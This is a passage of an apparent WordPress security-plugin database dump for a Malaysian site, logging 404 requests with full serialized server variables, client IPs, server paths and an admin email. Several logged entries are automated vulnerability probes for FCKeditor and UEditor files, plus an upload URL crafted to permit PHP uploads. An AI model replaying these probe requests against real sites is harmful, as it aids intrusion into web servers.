21:02:36',35034376,36841456,'https://bintara.com.my/FCKeditor/fckconfig.js',1,0,'106.36.160.91'),(28164,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/?p=167\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:5:\"p=167\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.146\";s:11:\"REMOTE_PORT\";s:5:\"42460\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeLk22CjfSaL8DJw2BXXAAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571261331.6554\";s:12:\"REQUEST_TIME\";s:10:\"1571261331\";}}','notice','2019-10-16 21:28:54','2019-10-16 21:28:52',35464680,37266528,'https://bintara.com.my/?p=167',1,0,'46.229.168.146'),(28165,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3428.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"77.83.202.34\";s:11:\"REMOTE_PORT\";s:5:\"51182\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeMWrlwIHsXUl8AjRFAoQAAANg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571261530.6303\";s:12:\"REQUEST_TIME\";s:10:\"1571261530\";}}','notice','2019-10-16 21:32:12','2019-10-16 21:32:11',35032728,36839032,'https://bintara.com.my/?page_id=18/contact.php',1,0,'77.83.202.34'),(28166,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"64969\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeOmG2CjfSaL8DJw2BcOQAAAEo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571262104.937\";s:12:\"REQUEST_TIME\";s:10:\"1571262104\";}}','notice','2019-10-16 21:41:47','2019-10-16 21:41:45',35032832,36844784,'https://bintara.com.my/?page_id=18/contact.php',1,0,'136.243.199.108'),(28167,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/FCKeditor/fckconfig.js\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:44:\"http://bintara.com.my/FCKeditor/fckconfig.js\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaePe22CjfSaL8DJw2BdlgAAAEM\";s:12:\"REDIRECT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:12:\"58.55.193.77\";s:11:\"REMOTE_PORT\";s:5:\"53905\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/FCKeditor/fckconfig.js\";s:10:\"SCRIPT_URL\";s:23:\"/FCKeditor/fckconfig.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaePe22CjfSaL8DJw2BdlgAAAEM\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571262331.6553\";s:12:\"REQUEST_TIME\";s:10:\"1571262331\";}}','notice','2019-10-16 21:45:34','2019-10-16 21:45:32',35423800,37235920,'https://bintara.com.my/FCKeditor/fckconfig.js',1,0,'58.55.193.77'),(28168,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/ueditor/net/controller.ashx\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:49:\"http://bintara.com.my/ueditor/net/controller.ashx\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeX@22CjfSaL8DJw2BsugAAAEA\";s:12:\"REDIRECT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"58.55.205.173\";s:11:\"REMOTE_PORT\";s:5:\"61355\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:10:\"SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeX@22CjfSaL8DJw2BsugAAAEA\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571264507.6215\";s:12:\"REQUEST_TIME\";s:10:\"1571264507\";}}','notice','2019-10-16 22:21:50','2019-10-16 22:21:48',35423184,37230312,'https://bintara.com.my/ueditor/net/controller.ashx',1,0,'58.55.205.173'),(28169,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"54103\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeY2m2CjfSaL8DJw2BuPAAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571264730.2751\";s:12:\"REQUEST_TIME\";s:10:\"1571264730\";}}','notice','2019-10-16 22:25:33','2019-10-16 22:25:30',35429680,37227880,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28170,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeZjrlwIHsXUl8AjRFKLAAAAM8\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.188.65\";s:11:\"REMOTE_PORT\";s:5:\"62329\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeZjrlwIHsXUl8AjRFKLAAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571264910.7123\";s:12:\"REQUEST_TIME\";s:10:\"1571264910\";}}','notice','2019-10-16 22:28:33','2019-10-16 22:28:31',34327216,36134584,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'141.8.188.65'),(28171,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:98:\"/wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=fbbf41c9f74c5e3d0bf4ea7e73569f7b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:120:\"http://bintara.com.my//wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:102:\"https://bintara.com.my/wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:80:\"/wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeaI7lwIHsXUl8AjRFKbAAAANU\";s:12:\"REDIRECT_URL\";s:80:\"/wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.55.43\";s:11:\"REMOTE_PORT\";s:5:\"55164\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:102:\"https://bintara.com.my/wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"SCRIPT_URL\";s:80:\"/wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaeaI7lwIHsXUl8AjRFKbAAAANU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571265059.7196\";s:12:\"REQUEST_TIME\";s:10:\"1571265059\";}}','notice','2019-10-16 22:31:01','2019-10-16 22:31:00',35047624,36852688,'https://bintara.com.my/wwwroot/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image',1,0,'49.70.55.43'),(28172,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:94:\"/aaa/Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:37:\"text/html, application/xhtml+xml, */*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6c13fa1c02e048270a8c1cf5450a06ad\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:12:\"HTTP_REFERER\";s:117:\"http://bintara.com.my//aaa//Admincenter/Uploads.upload.allowpath.1.allowext.gif%7Cphp%7Cjpeg%7Cpng%7Cbmp.do?dir=image\";s:15:\"HTTP_USER_AGENT\";s:70:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:9:\"dir=image\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:21:\"REDIRECT_QUERY_STRING\";s:9:\"dir=image\";s:19:\"REDIRECT_SCRIPT_URI\";s:98:\"https://bintara.com.my/aaa/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:19:\"REDIRECT_SCRIPT_URL\";s:76:\"/aaa/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaeaLOAdYZLFiOaMP2nUoQAAAAo\";s:12:\"REDIRECT_URL\";s:76:\"/aaa/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:11:\"49.70.55.43\";s:11:\"REMOTE_PORT\";s:5:\"55712\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:98:\"https://bintara.com.my/aaa/Admincenter/Uploads.upload.allowpath.1.allowext.gif|php|jpeg|png|bmp.do\";s:10:\"S